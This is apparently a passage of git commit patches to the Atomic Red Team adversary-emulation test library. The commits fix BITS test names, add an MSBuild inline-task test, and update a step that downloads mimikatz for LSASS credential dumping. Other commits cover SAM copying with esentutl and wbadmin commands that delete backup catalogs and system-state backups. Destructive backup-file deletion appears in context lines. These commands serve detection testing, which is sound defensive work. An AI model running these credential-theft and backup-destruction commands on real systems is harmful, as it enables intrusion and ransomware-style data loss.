persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt -persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 45b3707f..a67b358d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -214,7 +214,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] + - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -566,7 +566,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] + - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6aaddcbc..a3e562e4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -282,7 +282,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] + - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] - T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) @@ -597,7 +597,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] + - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9780bd31..2d183f14 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -10149,12 +10149,12 @@ persistence: ' name: command_prompt - - name: Bits download using destktopimgdownldr.exe (cmd) + - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - description: "This test simulates using destopimgdwnldr.exe to download a malicious - file\ninstead of a desktop or lockscreen background img. The process that - actually makes \nthe TCP connection and creates the file on the disk is a - svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. + description: "This test simulates using desktopimgdownldr.exe to download a + malicious file\ninstead of a desktop or lockscreen background img. The process + that actually makes \nthe TCP connection and creates the file on the disk + is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" supported_platforms: - windows @@ -26058,12 +26058,12 @@ defense-evasion: ' name: command_prompt - - name: Bits download using destktopimgdownldr.exe (cmd) + - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - description: "This test simulates using destopimgdwnldr.exe to download a malicious - file\ninstead of a desktop or lockscreen background img. The process that - actually makes \nthe TCP connection and creates the file on the disk is a - svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. + description: "This test simulates using desktopimgdownldr.exe to download a + malicious file\ninstead of a desktop or lockscreen background img. The process + that actually makes \nthe TCP connection and creates the file on the disk + is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" supported_platforms: - windows diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index a83a8bcb..4868cc10 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -16,7 +16,7 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter - [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute) -- [Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd)](#atomic-test-4---bits-download-using-destktopimgdownldrexe-cmd) +- [Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd)](#atomic-test-4---bits-download-using-desktopimgdownldrexe-cmd)
@@ -137,8 +137,8 @@ del #{local_file} >nul 2>&1

-## Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd) -This test simulates using destopimgdwnldr.exe to download a malicious file +## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) +This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ From 63d1e555d4fd941dee2b813825ceea1fa30ae78d Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 20 Jan 2021 16:26:45 -0700 Subject: [PATCH 082/131] MSbuild inline task using Visual Basic (#1371) * add visual basic test * correct comment --- atomics/T1127.001/T1127.001.yaml | 34 +++++++++++++++++++++++++++++++- atomics/T1127.001/src/vb.xml | 26 ++++++++++++++++++++++++ 2 files changed, 59 insertions(+), 1 deletion(-) create mode 100644 atomics/T1127.001/src/vb.xml diff --git a/atomics/T1127.001/T1127.001.yaml b/atomics/T1127.001/T1127.001.yaml index 3d6232f3..18ae7618 100644 --- a/atomics/T1127.001/T1127.001.yaml +++ b/atomics/T1127.001/T1127.001.yaml @@ -1,7 +1,7 @@ attack_technique: T1127.001 display_name: 'Trusted Developer Utilities Proxy Execution: MSBuild' atomic_tests: -- name: MSBuild Bypass Using Inline Tasks +- name: MSBuild Bypass Using Inline Tasks (C#) auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 description: | Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. @@ -33,3 +33,35 @@ atomic_tests: command: | #{msbuildpath}\#{msbuildname} #{filename} name: command_prompt + +- name: MSBuild Bypass Using Inline Tasks (VB) + description: | + Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the project file + type: Path + default: PathToAtomicsFolder\T1127.001\src\vb.xml + msbuildpath: + description: Default location of MSBuild + type: Path + default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 + msbuildname: + description: Default name of MSBuild + type: Path + default: msbuild.exe + dependency_executor_name: powershell + dependencies: + - description: | + Project file must exist on disk at specified location (#{filename}) + prereq_command: | + if (Test-Path #{filename}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" + executor: + command: | + #{msbuildpath}\#{msbuildname} #{filename} + name: command_prompt \ No newline at end of file diff --git a/atomics/T1127.001/src/vb.xml b/atomics/T1127.001/src/vb.xml new file mode 100644 index 00000000..b3879d26 --- /dev/null +++ b/atomics/T1127.001/src/vb.xml @@ -0,0 +1,26 @@ + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file From 52945641c044052ce92a0b4e7997c60824240adf Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 20 Jan 2021 23:27:23 +0000 Subject: [PATCH 083/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1127.001/T1127.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1127.001/T1127.001.yaml b/atomics/T1127.001/T1127.001.yaml index 18ae7618..209675a0 100644 --- a/atomics/T1127.001/T1127.001.yaml +++ b/atomics/T1127.001/T1127.001.yaml @@ -35,6 +35,7 @@ atomic_tests: name: command_prompt - name: MSBuild Bypass Using Inline Tasks (VB) + auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 description: | Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 82429aa0..51d3e427 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -653,3 +653,4 @@ a19ee671-ed98-4e9d-b19c-d1954a51585a 6aa58451-1121-4490-a8e9-1dada3f1c68c ec3a835e-adca-4c7c-88d2-853b69c11bb9 6502c8f0-b775-4dbd-9193-1298f56b6781 +ab042179-c0c5-402f-9bc8-42741f5ce359 From 05d2071e239937176dc4e4b24631e9253889252d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 20 Jan 2021 23:27:31 +0000 Subject: [PATCH 084/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 3 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +- atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/index.yaml | 38 +++++++++++++- atomics/T1127.001/T1127.001.md | 50 ++++++++++++++++++- 6 files changed, 93 insertions(+), 7 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index df220089..c91764f4 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -412,7 +412,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt -defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt +defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt +defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 78e97a21..b143b48c 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -219,7 +219,8 @@ defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/in defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt -defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt +defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt +defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a67b358d..67a11606 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -764,7 +764,8 @@ - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #1: Create local account with admin priviliges [windows] - [T1127.001 MSBuild](../../T1127.001/T1127.001.md) - - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] + - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a3e562e4..8a986c6b 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -412,7 +412,8 @@ - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #1: Create local account with admin priviliges [windows] - [T1127.001 MSBuild](../../T1127.001/T1127.001.md) - - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] + - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2d183f14..87217460 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33479,7 +33479,7 @@ defense-evasion: - Windows identifier: T1127.001 atomic_tests: - - name: MSBuild Bypass Using Inline Tasks + - name: MSBuild Bypass Using Inline Tasks (C#) auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 description: 'Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a @@ -33515,6 +33515,42 @@ defense-evasion: executor: command: "#{msbuildpath}\\#{msbuildname} #{filename}\n" name: command_prompt + - name: MSBuild Bypass Using Inline Tasks (VB) + auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 + description: 'Executes the code in a project file using msbuild.exe. The default + Visual Basic example file (vb.xml) will simply print "Hello from a Visual + Basic inline task!" to the screen. + +' + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the project file + type: Path + default: PathToAtomicsFolder\T1127.001\src\vb.xml + msbuildpath: + description: Default location of MSBuild + type: Path + default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 + msbuildname: + description: Default name of MSBuild + type: Path + default: msbuild.exe + dependency_executor_name: powershell + dependencies: + - description: 'Project file must exist on disk at specified location (#{filename}) + +' + prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" + executor: + command: "#{msbuildpath}\\#{msbuildname} #{filename}\n" + name: command_prompt T1134.003: technique: external_references: diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 078d1871..82b025c0 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -6,12 +6,14 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t ## Atomic Tests -- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks) +- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#)](#atomic-test-1---msbuild-bypass-using-inline-tasks-c) + +- [Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB)](#atomic-test-2---msbuild-bypass-using-inline-tasks-vb)
-## Atomic Test #1 - MSBuild Bypass Using Inline Tasks +## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#) Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. **Supported Platforms:** Windows @@ -52,4 +54,48 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB) +Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\vb.xml| +| msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319| +| msbuildname | Default name of MSBuild | Path | msbuild.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{msbuildpath}\#{msbuildname} #{filename} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Project file must exist on disk at specified location (#{filename}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{filename}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" +``` + + + +
From 89de74b637da5a2047c9cf92e16b0658b2b964f6 Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Fri, 22 Jan 2021 05:47:28 +1100 Subject: [PATCH 085/131] Updated Offline Credential Theft with mimikatz (#1373) Updated the command segment related to guid: 453acf13-1dbd-47d7-b28a-172ce9228023 Existing request URL path doesn't exist in gentilkiwi's repo. Added code segment will obtain the latest mimikatz_trunk.zip from the repo. I have repurposed the code segment done by Xiang ZHU https://copdips.com/2019/12/Using-Powershell-to-retrieve-latest-package-url-from-github-releases.html to meet the requirements here. Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1003.001/T1003.001.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 2c7a049f..1e58a03b 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -181,8 +181,15 @@ atomic_tests: prereq_command: | if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | + $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' + $request = [System.Net.WebRequest]::Create($url) + $response = $request.GetResponse() + $realTagUrl = $response.ResponseUri.OriginalString + $version = $realTagUrl.split('/')[-1] + $fileName = 'mimikatz_trunk.zip' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName + Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force @@ -247,4 +254,4 @@ atomic_tests: cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true From 7570e02911dae3cb5afd6b497e1e561cedaa6858 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 21 Jan 2021 18:48:01 +0000 Subject: [PATCH 086/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 9 ++++++++- atomics/T1003.001/T1003.001.md | 9 ++++++++- 2 files changed, 16 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 87217460..d9dbb15f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20427,8 +20427,15 @@ credential-access: ' get_prereq_command: | + $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' + $request = [System.Net.WebRequest]::Create($url) + $response = $request.GetResponse() + $realTagUrl = $response.ResponseUri.OriginalString + $version = $realTagUrl.split('/')[-1] + $fileName = 'mimikatz_trunk.zip' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName + Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 2ac5c0dc..12664f66 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -304,8 +304,15 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' +$request = [System.Net.WebRequest]::Create($url) +$response = $request.GetResponse() +$realTagUrl = $response.ResponseUri.OriginalString +$version = $realTagUrl.split('/')[-1] +$fileName = 'mimikatz_trunk.zip' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" +$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName +Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force From 22c65f4acd48bd97c6cc216bf6916879cda75a3e Mon Sep 17 00:00:00 2001 From: MrOrOneEquals1 Date: Fri, 22 Jan 2021 09:30:13 -0700 Subject: [PATCH 087/131] Fix to Cleanup Command for T1003.002 Test Number 3 (#1374) --- atomics/T1003.002/T1003.002.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index a0ef34d5..45fdcac7 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -78,7 +78,8 @@ atomic_tests: esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} name: command_prompt elevation_required: true - cleanup_command: del #{copy_dest}\#{file_name} >nul 2>&1 + cleanup_command: | + del #{copy_dest}\#{file_name} >nul 2>&1 - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 From 57ba7350b8e26e3e191dd7f13f867a208e7ebe30 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 22 Jan 2021 16:30:47 +0000 Subject: [PATCH 088/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 +++- atomics/T1003.002/T1003.002.md | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d9dbb15f..2a38792f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -22288,7 +22288,9 @@ credential-access: ' name: command_prompt elevation_required: true - cleanup_command: del + cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 + +' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index f28df55b..728eef9d 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -150,7 +150,7 @@ esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} #### Cleanup Commands: ```cmd -del +del #{copy_dest}\#{file_name} >nul 2>&1 ``` From 373176bcba85f4ae978b2cd24c06cfd85fe327d5 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Sat, 23 Jan 2021 17:53:20 -0700 Subject: [PATCH 089/131] T1490 - WBAdmin (#1375) * Added wbadmin delete systemstatebackup * Update T1490.yaml Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> --- atomics/T1490/T1490.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index d0f6568e..aea49d27 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml @@ -37,7 +37,7 @@ atomic_tests: wmic.exe shadowcopy delete name: command_prompt elevation_required: true -- name: Windows - Delete Windows Backup Catalog +- name: Windows - wbadmin Delete Windows Backup Catalog auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c description: | Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, @@ -46,7 +46,7 @@ atomic_tests: - windows executor: command: | - wbadmin.exe delete catalog -quiet + wbadmin delete catalog -quiet name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -91,4 +91,13 @@ atomic_tests: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk name: command_prompt elevation_required: true - +- name: Windows - wbadmin Delete systemstatebackup + description: | + Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. + supported_platforms: + - windows + executor: + command: | + wbadmin delete systemstatebackup -keepVersions:0 + name: command_prompt + elevation_required: true \ No 